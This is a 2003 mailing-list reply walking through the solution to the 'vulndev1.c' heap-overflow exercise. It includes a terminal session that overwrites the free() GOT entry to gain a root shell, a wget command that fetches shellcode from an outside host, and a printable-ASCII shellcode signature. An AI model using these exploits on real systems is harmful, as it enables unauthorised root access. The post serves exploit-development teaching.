Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)

From: Jon Erickson <matrix(at)phiral.com>
Date: Wed May 21 2003 - 18:58:25 EDT

On Wed, 21 May 2003 14:38:11 -0700
"Jeremy Junginger" <jj@act.com> wrote:

> There was an erroneous /xfg below, that I re-ran with /xff. It's marked

Basically.. the free() function is going to add 12 to the address you feed it.. so you're just subtracting 12 to compensate for that...

> [root@OxFFFFFF bufferoverflow]# pcalc 0x38-12
> 44 0x2c 0y101100

your shellcode consists of many \x42 type bytes.. this is how you represent bytes using printf() and other format functions using just printables. Basically, if you just do like..

printf `cat shell` > new_shell

that should fix it... also, if you want to use the piece of shellcode I used, you can just

wget www.phiral.com/research/shell

It's just a really basic setruid(0), then /bin/sh shellcode.. it's actually kinda big too..

> (Subtract the size of the shellcode from SIZE)

well.. as Cameron Brown pointed out in an earlier post.. unless you happen to get lucky, you really need to have a jump statement at the beginning of the shellcode, because about 12 bytes will get mangled.. and if you try to execute the mangled bytes, it will segfault.

matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c
matrix@overdose vuln-dev $ sudo chown root.root vuln1
matrix@overdose vuln-dev $ sudo chmod +s vuln1
matrix@overdose vuln-dev $ export SMEGMA=`printf "\xeb\x0e"`AAAAAAAAAAAAAAAAAA`cat shell`
matrix@overdose vuln-dev $ echo 'main(){printf("%p\n",getenv("SMEGMA"));}'>q.c;gcc -o q.ert q.c;./q.ert;rm q.*

0xbffffa04
matrix@overdose vuln-dev $ objdump -R ./vuln1 | grep free 080495f8 R_386_JUMP_SLOT free
matrix@overdose vuln-dev $ pcalc 0xf8-12

        236 0xec 0y11101100 matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x253;'` `printf "\xec\x95\x04\x08\x04\xfa\xff\xbf";` sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio) sh-2.05b#

If you try using the method above (putting the shellcode in an environment variable), make sure that the name of the exploit program (vuln1) is the same length as the program used to get the address of the env variable (q.ert)

-- 
%JOSE_RONNICK%50,:-dddd-0EEb-pVVyP\-1111-jjjj-yNNN-_4HUP-qq0q-02%r-_Z%JP-%Iwp-5kyyP-n5nn-aTTa-1271P-4ttt-/888-3tSMP-bbnb-L8wL-kMwgP-3Hy3-rqzWP-m%m8-h4x--v%r5P-S7S7-g7g7-F2u2PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP

Received on Fri May 23 11:49:36 2003